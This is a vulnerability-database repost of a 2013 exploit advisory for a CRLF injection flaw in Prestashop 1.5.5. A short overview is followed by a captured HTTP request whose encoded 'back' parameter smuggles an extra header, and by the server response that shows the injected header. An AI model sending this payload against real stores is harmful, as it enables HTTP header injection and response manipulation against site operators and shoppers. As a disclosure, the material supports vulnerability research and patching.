Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Prestashop 1.5.5 CRLF Injection

🗓️ 06 Sep 2013 00:00:00Reported by EsacType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

Prestashop v1.5.5 CRLF Injection Vulnerability - Risk level: Medium. Exploit allows injection of extra HTTP headers, possibly leading to content manipulation or serving from a different domain

Code
`##############################################################  
#Exploit Title: Prestashop v1.5.5 - CRLF Injection Vulnerability   
#Official site: http://www.prestashop.com  
#Official Demo : http://demo-store.prestashop.com/  
#Risk Level: Medium  
#Exploit Author: Esac  
#Homepage author : www.iss4m.ma  
#Email author : [email protected]  
#Last Checked: 06/09/2013  
#############################################################  
  
  
+----------+  
| OVERVIEW |  
+----------+  
  
PrestaShop is the most reliable and flexible Open-source e-commerce software. Since 2007,PrestaShop has revolutionized the industry by providing features that  
engage shoppers and increase online sales. The Prestateam consists of over 100 passionate individuals and more than 350,000 community members dedicated to innovated technology.  
It has more than 2.000.000 downloads and won the best open-source e-commerce software in the last few years.  
  
When installing and analyzing PrestaShop on a secure environment I discovered that it's vulnerable for CRLF injection vulnerability that may allow an attacker to include extra HTTP headers when viewing web pages. If Prestashop is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request.  
  
Exploitation of this flaw may allow an attacker to inject additional HTTP headers into a request. Abuse of the 'Host' header may cause the request to be served as if made to a different domain, possibly providing the attacker with more control over the content returned.  
  
This vulnerability has been reported for Prestashop v1.5.5 and may be other versions are affected.  
  
  
+---------------------------------------------------------------------------------------+  
  
  
HTTP Headers Request :  
  
  
POST /fr/adresse HTTP/1.1  
Content-Length: 389  
Content-Type: application/x-www-form-urlencoded  
Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZGtZ3A7mQpE2jo2VD0mzY3wtqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgGGr4hYKm51D3wGkqO0lLNZowKzQVgJqWqSLngur8z4I%3D000404  
Host: demo-store.prestashop.com  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)  
Accept: */*  
  
address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&alias=1&back=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection&city=San%20Francisco&company=Acunetix&dni=1&firstname=tdupumgx&id_country=231&id_state=&lastname=carbrbbm&other=1&phone=555-666-0606&phone_mobile=555-666-0606&postcode=94102&select_address=1&submitAddress=Valider&token=fa85a76b06b6cd05245288ea8006175a&vat_number=1  
  
  
HTTP Headers Response :  
  
HTTP/1.1 302 Found  
Date: Wed, 28 Aug 2013 10:28:39 GMT  
Server: Apache  
Set-Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZG1%2BptPMOxtxYYBfzPV0v8ktqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgq4zKl3PuSt10RxAAYjxEcdQEEu5W1AjY6PXJwUz1e34%3D000404; expires=Tue, 17-Sep-2013 10:28:39 GMT; path=/; domain=demo-store.prestashop.com; httponly  
Location: http://demo-store.prestashop.com/fr/  
ZSL-Custom-Header:love_injection  
Vary: Accept-Encoding  
Content-Length: 0  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html; charset=utf-8  
  
  
  
+----------------------------------------------------------------------------------------+  
  
Knowledge is not an Object , it's a flaw :)  
Greetz : White Tarbouch TEAM - Cobra   
WwW.Iss4m.Ma  
./Issam IEBOUBEN Aka Esac  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Sep 2013 00:00Current
prestashop. crlf injection. vulnerability. http headers. exploit. risk level. domain manipulation. content manipulation. injection. security.
42